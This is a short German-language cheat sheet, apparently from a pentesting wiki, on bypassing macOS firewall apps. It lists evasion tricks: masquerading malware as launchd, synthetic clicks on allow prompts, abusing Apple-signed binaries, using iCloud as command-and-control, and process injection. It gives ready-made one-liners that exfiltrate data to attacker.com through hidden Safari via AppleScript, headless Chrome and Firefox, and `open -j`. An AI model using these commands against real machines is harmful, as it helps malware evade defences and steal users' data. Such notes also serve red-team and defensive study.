macOS Bypassing Firewalls

Gefundene Techniken

Die folgenden Techniken wurden in einigen macOS-Firewall-Apps gefunden.

Missbrauch von Whitelist-Namen

• Zum Beispiel das Benennen von Malware mit Namen von bekannten macOS-Prozessen wie launchd

Synthetischer Klick

• Wenn die Firewall den Benutzer um Erlaubnis bittet, lässt die Malware auf Erlauben klicken

Verwendung von von Apple signierten Binärdateien

• Wie curl, aber auch andere wie whois

Bekannte Apple-Domains

Die Firewall könnte Verbindungen zu bekannten Apple-Domains wie apple.com oder icloud.com zulassen. Und iCloud könnte als C2 verwendet werden.

Generischer Bypass

Einige Ideen, um Firewalls zu umgehen

Überprüfen des erlaubten Datenverkehrs

Das Wissen über den erlaubten Datenverkehr hilft Ihnen dabei, potenziell in die Whitelist aufgenommene Domains oder die Anwendungen zu identifizieren, die darauf zugreifen dürfen.

lsof -i TCP -sTCP:ESTABLISHED

Ausnutzen von DNS

DNS-Auflösungen werden über die signierte Anwendung mdnsreponder durchgeführt, die wahrscheinlich Zugriff auf DNS-Server haben wird.

Über Browser-Apps

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Über Prozessinjektionen

Wenn Sie Code in einen Prozess injizieren können, der berechtigt ist, eine Verbindung zu einem beliebigen Server herzustellen, könnten Sie die Firewall-Schutzmaßnahmen umgehen:

Referenzen

• https://www.youtube.com/watch?v=UlT5KFTMn2k